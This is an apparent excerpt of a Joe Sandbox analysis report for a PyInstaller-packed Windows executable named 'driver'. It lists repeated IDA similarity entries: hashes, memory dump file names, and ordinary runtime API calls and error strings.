                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                • Instruction ID: 4c7b0c115121c1cbbd8fae8cf1599d275707e7a567bc843d9d4be60a5255390a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8731F422B5A68156F7209B62A8502F76295BF88FDCF400132EE8DC375BEFBCD5469300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                                • Instruction ID: 7cd31d4b8acf0b514270a77b9ccc8e0a4560aed8dc0cec3c390876a684a75fec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00318432A4A68189EB24DF22E8552F963A0FF88B88F440135EA4D87B5BDF7CD100D700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6A29B918F,?,00007FF6A29B3C55), ref: 00007FF6A29B2BA0
                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF6A29B2C2A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                • Instruction ID: f3ac2ac17ec3c8bf984ab61d76ec7833834c9d58a30cd64f3de3ed90b4df0346
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2221A362B09B4186E7109B26F4547EA73A4FB88BC8F400136EE8D9765BDF7CD605D740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6A29B1B99), ref: 00007FF6A29B2760
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                • Instruction ID: 52964d977038a293663dd9cfafa3e2ed55c28e7c3bf06825afa48c4db16e9e47
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D21A172A5AB8182E620DB52F8817E66394FF88BC8F400136EE8C9375ADFBCD5459700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                • Instruction ID: d520a6f038c21e0ef555ee41f3a61349b9345e854baaa79cd777a563fd590117
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41F0C231B4AB0681FB148B22E4643395360BF49F69F440239C66E861E5CFACE044F300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                • Instruction ID: 6d07d2a71f6d4b4cc8c80b1c1d7a0f55c5dafa228b64f865ff172a1211eeb096
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB119172EDEA2301F6543126D75637520C46F5DBBCF050634EA6E8A2D7EEECB9417104
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB41F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB43E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB466
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB477
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29CA613,?,?,00000000,00007FF6A29CA8AE,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CB488
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                • Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                                • Instruction ID: 1d7f2d9e553d8f47129fa4d761a6aaf4f07bbf8e62ae070a2063227739b019d3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F118120F8F60249FA589723A5A127961425F64FBCF448335E87DC66D7DEBCF441A301
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                • Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                                • Instruction ID: 32ae4e378718d1dd155a0806f2024c251872120cf07e713f444891ed9415ca24
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C112A20E8B2074DF96CA62754612BE21425F56F7CF444734D93ECA6C7DDACB8417202
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                • Instruction ID: 6c0a7007b30ce88d8657dfd546cd2038640b9ffcd029eb39e61ab9fc3e2a1f47
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F091CF32A4AA4689F7658E26D45077D37A1AB84F9CF444136DA8AC73CBDFBCF405A301
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                • Instruction ID: 6cae1eda240d8d74012f358bc9fd8d4ff0139abd9d968cc9023134093b84cc96
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3381A172E8A2428EF7644E27C11027836A0AF11F8CF958036DA0DD769BDFADF941B741
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                • Instruction ID: 715ec2aea275e2c7a29b8bfca51d503d3dfeb064d06ee3f2f22374a1d0862013
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC519F32B5A6028AEB149F16E444A787791FB44F9CF108134DA4E8BB8BDFBDE841D710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                • Instruction ID: ca0e5d33da3e64865ddb7080a57a05894876cbec074985cacd0516a99a3c4712
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B517E3294928686EB748F26904437876A0FB55F98F144236EA9DC7B97CFBCE850E700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                • Instruction ID: 3e645d1c7f53a3bc27edbec73665b6abc29c5937c1d24db6cad482e3f846c8a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B619372909BC585EB608B16E4403AAB7A0FB95F98F044635EB9D87B57DFBCD190CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,?,00007FF6A29B352C,?,00000000,00007FF6A29B3F23), ref: 00007FF6A29B7F22
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                                • Instruction ID: 7e4cf7fcca1263ab1e9796fc657e1b1d4af76f9d141fe1bea4070a68a309b58f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E131C42265AAC145EB219B22E8507EA6354EF84FE8F441331EE6D877CBDFACD6019700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
